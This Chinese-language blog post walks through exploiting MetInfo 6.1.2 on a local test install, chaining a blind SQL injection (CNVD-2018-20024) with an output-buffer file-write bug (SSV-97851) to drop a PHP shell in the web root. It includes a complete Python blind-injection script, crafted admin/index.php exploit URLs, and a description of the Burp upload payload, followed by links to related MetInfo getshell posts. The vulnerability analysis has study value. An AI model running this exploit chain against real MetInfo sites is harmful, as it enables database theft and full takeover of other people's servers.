metinfo thumb.php,Metinfo利用SQL注入getshell

于 2021-03-26 04:57:07 发布
阅读量235 收藏 1
点赞数
文章标签: metinfo thumb.php

简介Metinfo是一个用MYSQL+PHP开发的适用于中小型企业的CMS(建站系统)

2018年10月Metinfo被爆出存在SQL注入漏洞(CNVD-2018-20024)

2019年3月11号爆出Metinfo利用sql注入getshell漏洞(SSV-97851)

利用上述两个漏洞进行Getshell测试

漏洞解析

CNVD-2018-20024

源码

/app/system/message/web/message.class.php

d5dfb30e009bb31d51356ab7b5b29796.png

观察高亮部分语句,发现columnid参数的数据没有用单引号括起来,期待用户输入一个数值,如果没有过滤参数,可以直接进行SQL注入

例:

bfd58d6ca16b3deaabedefbf41a7cdab.png

跟进okinfo函数

ec2b2dd966de4068acdf0b2ca8a236c3.png

但没有过滤是不可能的,看install/index.php文件中

cdf0da1bfcd8357453e53ab463b8b2af.png

调用daddslashes()函数对客户端传入的参数进行过滤,跟进daddslashes()函数

3e596e030a90d624a6dea34b253e34ff.png

如果魔法引号开关未开启,进行数据过滤,高亮部分根据IN_ADMIN这个常量是否定义,决定使用过滤函数的方式。addslashes()只是转义了预定义字符(单引号、双引号、反斜杠),但sqlinsert()这个函数则基本过滤了敏感词,无法进行SQL注入。所以是否定义IN_ADMIN常量成为突破口。在源码中搜索关键词’IN_ADMIN’

08329749c69a3b8100f6019e4b975186.png发现在admin/index.php中定义了IN_ADMIN,其实就是后台管理员登陆的入口

bdc00db83a99a31a56122cfdb23e076d.png

admin/index.php中不止定义了IN_ADMIN,还获取了好几个$_GET参数,通过这几个参数,可以访问普通用户能访问到的所有页面。

通过admin/index.php访问message页面

http://127.0.0.1/metinfo6.1.2/admin/index.php? m=web&n=message&c=message&a=domessage

观察domessage函数,可以控制action字段,访问add函数

cf3081ed34ced27f2db3ccf34f82dc44.png

添加完整参数访问存在漏洞函数

http://127.0.0.1/metinfo6.1.2/admin/index.php?m=web&n=message&c=message&a=domessage&action=add&para137=huha&para186=1212341234@qq.com&para138=789&para140=789&code=1234&lang=cn

配合id参数进行盲注dump数据库注:并不是所有类的方法都可以直接通过admin/index.php直接访问

229770b3d4e712a25fbcde09bef21997.png

本地测试# 盲注脚本

import requests

def doinject(url, sqli_input, i, num):

# 在这里可以自定义你的payload

payload = "ascii(substr((%s),%d,1))>%d&code=5R8j" % (sqli_input, i + 1, num)

r = requests.get(url + payload)

# 在这里定义对于不同响应的处理

if "验证码错误" in r.text:

return True

else:

return False

def getvalue(url, len, sqli_input):

# 二分法

flag = ''

for i in range(len):

s = 33

t = 126

while (s < t):

m = (s + t) / 2

result = doinject(url, sqli_input, i, m)

if result:

s = m + 1

else:

t = m

if (t - s <= 1):

if (doinject(url, sqli_input, i, s)):

m = t

break

else:

m = s

break

flag += chr(int(m))

print (flag)

if __name__ == '__main__':

# 目标url

base_url = "http://127.0.0.1/metinfo6.1.2/admin/index.php"

query = "?m=web&n=message&c=message&a=domessage&action=add¶137=huha¶186=1278570385@qq.com¶138=789¶140=789&lang=cn&id=42 and "

url = base_url+query

print(url)

# 在这里定义你的注入语句

sqli_input = 'select database()'

getvalue(url, 30, sqli_input)

a0a2984ae3acf7ed7c2b20edfa8575a7.png

漏洞解析

SSV-97851

源码

app/system/include/class/web.class.php

898a9b4deed5196ea1ff53afc06a4f71.png

调用ob_get_contents()函数将缓冲区的数据写进$output变量中。注:如果程序开启了缓冲区,PHP会先将要输出的数据放到内存中,等待指令输出。

c39eb7c93d2560764bf123c713497a68.png

继续往下看,如果if后面的判断语句成立,就会将output变量,也就是缓冲区的内容写入到PATH_WEB.$filename文件中,表达式要成立的关键是metindonow字段的内容跟met_member_force字段的内容相同,$_M['config']['met_member_force']是建站时配置的初始化参数,可以在install/index.php中找到,这个字段的值是运用randstr(7)求出的一个随机7位小写字符串

9490c3d2e2bdc6260ee7e274395656df.png

很明显这个字段存在数据库中,可以利用上一个漏洞SQL注入获取信息,因为$_M['form']['html_filename']是可控的,所以output写入的文件名是可控的

现在最关心的就是$output的值,也就是文件内容是否是可控的,找到输出缓冲区的地方:

app/system/include/module/uploadify.class.php中的上传文件函数

59f1a3aa4e0a2b4b5f3863184d153994.png

这个类继承了上面那个web基类的析构函数,echo语句输出的内容暂存在缓冲区中,可以利用注入出来的$_M['config']['met_member_force']字段将echo语句内容写入到文件中

跟进upload方法,发现可以控制['formname']字段将上传文件属性存储到$filear变量中

92a29182adfc0d4204f2bb0a184d8f5e.png

如果上传的文件名后缀不在系统给出的白名单中,会调用error函数将后缀名写到$back变量中

e2e3bc7250b9d14979a5d83161ea8ad3.png

711c89476e1f31001690b6ca3db29702.png

观察后缀名处理函数,发现如果文件没有后缀名,那么文件名就是后缀名,上传文件名是可控的,即写入缓冲区的内容是可控的

cddcaf168ff04ae5402f0dadb6381935.png

类似第一个漏洞,利用admin/index.php添加参数访问doupload漏洞函数,修改参数任意上传文件

本地测试

利用burp抓包构建payload

0b3d3b839d1a84b8b20501d4a5eee97a.png

在网站根目录写入5.php文件

f2a2ff09279c9678b6306e2fa5127f0e.png

至此,可以利用Metinfo的SQL注入Getshell

相关

weixin_39957068
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php.ini 米拓_MetInfo 无需登录前台直接GETSHELL
weixin_39902184的博客
12-21 301
metinfo整体做的还算不错,但是一个小疏忽,越权导致大漏洞代码如下:admin/include/common.inc.php 由于之前在最外围进行了一次参数解析,所以这里可以通过全量覆盖过来先不说这里,一会儿用得上,我们看一下admin/include/lang.php:if($_GET[langset]!="" and $met_admin_type_ok==1){$languser = $...
CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞
玄道的网安博客
11-25 1436
0x00漏洞简介 metinfo是一个cms 6.1.2版本中存在一个sql盲注漏洞 0x01漏洞细节与漏洞利用 在\app\system\message\web\message.class.php的add函数。 get_one这里有个columnid 这个地方是传入int类型的参数 没有经过单引号的包围 所以对于那些不需要使用单引号的注入语句就起不到过滤作用 比如 and 1=2。 ...
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
08-03
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
mysql注入shell的内置函数_Metinfo利用sql注入快速getshell
weixin_39637700的博客
01-21 247
### 0x00MetInfo是一个比较的企业建站软件,用户众多。在去年的时候,曾爆出过几个漏洞,有XXE,SQL注入,任意文件读取等,详情见以下链接。印象比较深刻的是两个SQL注入漏洞,一个位于message.calss.php,一个位于feedback.class.php。漏洞都位于前台。只不过第二个洞比较苛刻,每注入一次需要输入一次验证码,利用起来貌似很鸡肋。最近看了一次metinfo,找到...
MetInfo V5.1 GetShell一键化工具
ai74583的博客
06-08 338
# 漏洞解析: config/config.inc.php $langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'"); if(!$langoks)die('No data in the database,please reinstall.'); if(!$langoks[useok]&&...
metinfo5.3mysql支持_MetInfo5.3.19安装过程过滤不严导致Getshell
weixin_35207054的博客
02-17 319
前言前几天在先知看到的漏洞,就很想写个分析过程了的,因为比赛培训和在审计一个CMS拖到了今天。环境Web: phpstudySystem: Windows 7 X64Browser: Firefox QuantumPython version : 2.7Tools: PhpStorm 2017.3.3、Seay源代码审计系统任意文件删除漏洞复现POC前提:需要由对应的删除权限flienamecsv...
MetInfo 3.0 PHP代码注入漏洞(getshell)
kendyhj9999的专栏
05-29 1505
MetInfo 3.0 PHP代码注入漏洞(getshell) 来源:本站转载 作者:佚名 时间:2010-11-07 TAG: 我要投稿 官网:http://www.metinfo.cn/ 关键字:"Powered by MetInfo 3.0 "  来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
metinfo 后台sql注入1
08-03
MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
基于PHPMetInfo 企业网站系统.zip
07-21
MetInfo作为基于PHP的系统,充分利用PHP的特性,提供了一个强大的后台管理界面,方便用户快速搭建和维护企业官方网站。 【描述】"基于PHPMetInfo 企业网站系统.zip" 是一个压缩包文件,其中包含了构建MetInfo...
基于PHPMetInfo企业网站系统源码.zip
08-27
5. 安全防护:源码中包含了防止SQL注入、XSS攻击等安全措施,保障网站安全运行。 四、MetInfo的二次开发 对于有特殊需求的企业,MetInfo提供了丰富的API接口和插件机制,允许开发者进行定制化开发。例如,可以通过...
PHP实例开发源码—MetInfo 企业网站系统.zip
11-11
MetInfo考虑了Web应用的安全问题,包括输入验证、SQL注入防护、XSS攻击防御等。通过查看源码,你可以学习到如何在PHP中实现这些安全措施,提升自己在Web安全方面的知识。 **六、SEO优化** MetInfo集成了搜索引擎...
metinfo多个漏洞(可getshell)
kendyhj9999的专栏
05-21 2902
http://www.wooyun.org/bugs/wooyun-2010-043795
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 3705
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshellMetinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &amp;action=editor &amp;foldername=upload &...
metinfo thumb.php,MetInfo前台Getshell,附上0day
weixin_31608037的博客
03-26 197
简要描述:MetInfo 无需登录前台GETSHELL 看着metinfo 注入都两个$$ @疯狗 @Finger来一道闪电吧详细说明:metinfo整体做的还算不错,但是一个小疏忽,越权导致大漏洞代码如下:admin/include/common.inc.php 由于之前在最外围进行了一次参数解析,所以这里可以通过全量覆盖过来先不说这里,一会儿用得上,我们看一下admin/include/lan...
metinfo thumb.php,新年礼包第一弹(metinfo后台getshell)
weixin_30498015的博客
03-26 232
开场都是为了烘托气氛,一句话:新年到,燥起来,煎饼会有的,肉也会有的。漏洞文件:/admin/app/physical/physical.phpPHP$post=array('ver'=>$metcms_v,'app'=>$applist);$result=curl_post($post,60);if(link_error($result)==1){$results=explode('...
MetInfo 无需登录前台直接GETSHELL(v5.2)-学习笔记
小龙在线
08-20 1233
漏洞名称 MetInfo 无需登录前台直接GETSHELL(v5.2)(wooyun-2015-094886) 发布时间 2015-05-03 漏洞分类 文件包含 缺陷代码 此漏洞涉及到了两个文件./admin/include/common.inc.php和./admin/include/lang.php,问题主要出在lang.php文件中。 在文件./admin/include/lang.php的17~47行: if($_GET[langset]!="" and $met_admin_type_ok==1
metinfo thumb.php,MetInfo最新版任意文件读取
weixin_39626369的博客
03-26 198
攻击者通过提交精心构造的参数可以获取服务器端任意文件内容!MetInfo 5.2(当前最新版本)的 include/thumb.php 文件本来用来获取缩略图,但是其构造的缩略图路径存在外部可控变量,攻击者可以借此获取任意文件内容:include/thumb.php关键代码如下$ext1 = explode("/", $dir); //$dir变量由外部传入$count = count($ext...
MetInfo前台注入漏洞
willow_liang的博客
11-05 402
漏洞存在点在C:\phpstudy\WWW\MetInfo6.1.2\app\system\message\web\message.class.php文件第三十七行 1.由于C:/phpstudy/WWW/MetInfo6.1.2/app/system/include/function/common.func.phpINADMIN常量没有定义,所以使用sqlinsert语句来对用户的输入内容来进行sql危险字符的过滤。想办法绕到下面的代码,让IN_ADMIN是一个常量。 2.可以先利用admin/inde
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6109
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
metinfo5.0.zip
最新发布
08-29
metinfo5.0.zip是一个软件压缩包,其中包含了MetInfo5.0版本的相关文件和代码。MetInfo是一款基于PHP+MySQL的网站建设系统,可以帮助用户快速搭建和管理自己的网站。 MetInfo5.0版本是MetInfo官方最新发布的版本,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值